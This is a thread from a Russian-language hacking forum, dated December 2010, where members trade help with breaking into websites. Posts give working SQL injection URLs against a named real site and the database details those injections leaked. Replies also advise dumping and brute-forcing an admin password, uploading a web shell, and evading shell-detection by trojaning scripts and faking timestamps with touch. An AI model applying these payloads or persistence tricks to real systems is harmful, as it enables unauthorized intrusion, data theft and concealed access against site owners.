HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16001  
Старый 29.12.2010, 15:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от rootmd  
rootmd said:
в другие папки могу но ведь мне нужно чтоб я смог зайти на нем через веб сервер
я имел ввиду папки, которые видны из веб

Цитата:
Сообщение от Gorev  
Gorev said:
с чего ты взял что там чмод 777 ?
спроведливый вопрос.

rootmd

это когда phpmyadmin стал показывать chmod?
 
Ответить с цитированием

  #16002  
Старый 29.12.2010, 16:12
Bo0oM
Новичок
Регистрация: 26.12.2009
Сообщений: 4
Провел на форуме:
76437

Репутация: 5
Отправить сообщение для Bo0oM с помощью ICQ
По умолчанию

Народ, чем брутить SQl inj вида

1'+and+'1'='1

Вроде есть тулзы для брута через substring()? кинте в лс плиз
 
Ответить с цитированием

  #16003  
Старый 29.12.2010, 18:20
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
 
Ответить с цитированием

  #16004  
Старый 29.12.2010, 19:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от rootmd  
rootmd said:
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
 
Ответить с цитированием

  #16005  
Старый 29.12.2010, 23:28
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

имеется

1. sql injection, под суперюзером

2. phpmyadmin, нормальный юзер
 
Ответить с цитированием

  #16006  
Старый 29.12.2010, 23:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от rootmd  
rootmd said:
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер
1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
 
Ответить с цитированием

  #16007  
Старый 30.12.2010, 14:00
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

eclipse

http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat( version(),floor(rand(0)*2))having+min(0)+or+1--+

версия как бы намекае
 
Ответить с цитированием

  #16008  
Старый 30.12.2010, 14:11
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--

Version4.1.22-Max

Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net

DB db1081176_stiga_table_tennis

так что брути таблы...

upd

~d0s~ опередил )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #16009  
Старый 31.12.2010, 01:41
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

Что за скрипт умет находить шеллы?

И что можно сделать что бы не детектил..

Заливаю на сайт шелл , на следующий день его нет.

В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
 
Ответить с цитированием

  #16010  
Старый 31.12.2010, 01:44
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

админ дебил попался значить ))

протроянь скрипты и не забудь про команду touch =)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ